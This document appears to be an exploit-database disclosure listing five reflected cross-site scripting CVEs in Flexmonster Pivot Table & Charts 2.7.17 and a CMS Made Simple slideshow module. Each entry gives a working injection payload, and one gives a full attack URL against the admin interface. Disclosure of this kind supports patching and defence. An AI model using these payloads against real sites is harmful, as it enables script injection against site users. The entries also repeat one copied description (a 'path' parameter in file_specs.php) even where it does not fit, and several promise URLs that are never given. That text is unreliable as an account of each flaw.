Flexmonster Pivot Table And Charts 2.7.17 Cross Site Scripting

`# Exploit Title: CVE-2020-20140 : Cross Site Scripting (XSS) vulnerability in Remote Report component under the Open menu in Flexmonster Pivot Table & Charts 2.7.17  
# Date: 08/01/2020  
# Exploit Author: Marco Nappi  
# Vendor Homepage: n/a  
# Software Link: n/a  
# Version:Flexmonster Pivot Table & Charts 2.7.17  
# Tested on:Flexmonster Pivot Table & Charts 2.7.17  
# CVE : CVE-2020-20140  
  
Reflected XSS:  
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.  
  
payload:  
<svg onload=alert("OpenRemoteReport")><!--  
  
-------  
  
# Exploit Title: CVE-2020-20139 : Cross Site Scripting (XSS) vulnerability in the Remote JSON component   
# Date: 08/01/2020  
# Exploit Author: Marco Nappi  
# Vendor Homepage: n/a  
# Software Link: n/a  
# Version:Flexmonster Pivot Table & Charts 2.7.17  
# Tested on:Flexmonster Pivot Table & Charts 2.7.17  
# CVE : CVE-2020-20139  
  
Reflected XSS:  
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.  
  
payload:  
<svg onload=alert("OpenRemoteJSON")><!--  
  
-------  
  
# Exploit Title: CVE-2020-20141 : Cross Site Scripting (XSS) vulnerability in the To OLAP (XMLA) component Under the Connect menu in Flexmonster Pivot Table & Charts 2.7.17.  
# Date: 08/01/2020  
# Exploit Author: Marco Nappi  
# Vendor Homepage: n/a  
# Software Link: n/a  
# Version:Flexmonster Pivot Table & Charts 2.7.17  
# Tested on:Flexmonster Pivot Table & Charts 2.7.17  
# CVE : CVE-2020-20141  
  
Reflected XSS:  
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.  
  
payload:  
<svg onload=alert("OLAPTool")><!--  
  
-------  
  
# Exploit Title: CVE-2020-20138 : Reflected XSS in Cms Made Simple module "Showtime2 Slideshow"  
# Date: 08/01/2020  
# Exploit Author: Marco Nappi  
# Vendor Homepage: n/a  
# Software Link: [download link if available]  
# Version:Cms Made Simple - 2.2.4   
# Tested on:Cms Made Simple - 2.2.4  
# CVE : CVE-2020-20138  
  
Reflected XSS:  
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.  
  
example : http://<HOST>/admin/moduleinterface.php?mact=Showtime2%2Cm1_%2Caddslides%2C0&_sk_=8a5db6575606c958c74&m1_showid=1&m1_module_message=%3Csvg%20onload=alert()%3E  
  
-------  
  
# Exploit Title: CVE-2020-20142 :Cross Site Scripting (XSS) vulnerability in the "To Remote CSV" component under "Open" Menu in Flexmonster Pivot Table & Charts 2.7.17.  
# Date: 08/01/2020  
# Exploit Author: Marco Nappi  
# Vendor Homepage: n/a  
# Software Link: n/a  
# Version:Flexmonster Pivot Table & Charts 2.7.17  
# Tested on:Flexmonster Pivot Table & Charts 2.7.17  
# CVE : CVE-2020-20142  
  
Reflected XSS:  
The Reflected XSS is a result of insufficient input sanitization of the 'path' parameter when fetching the file specifications (file_specs.php). Below I have provided an example URL. When using this URL the user navigates to an non-existing file (the XSS payload). This results in the execution of the payload.  
  
payload:  
<svg onload=alert("OpenRemoteCSV")><!--  
`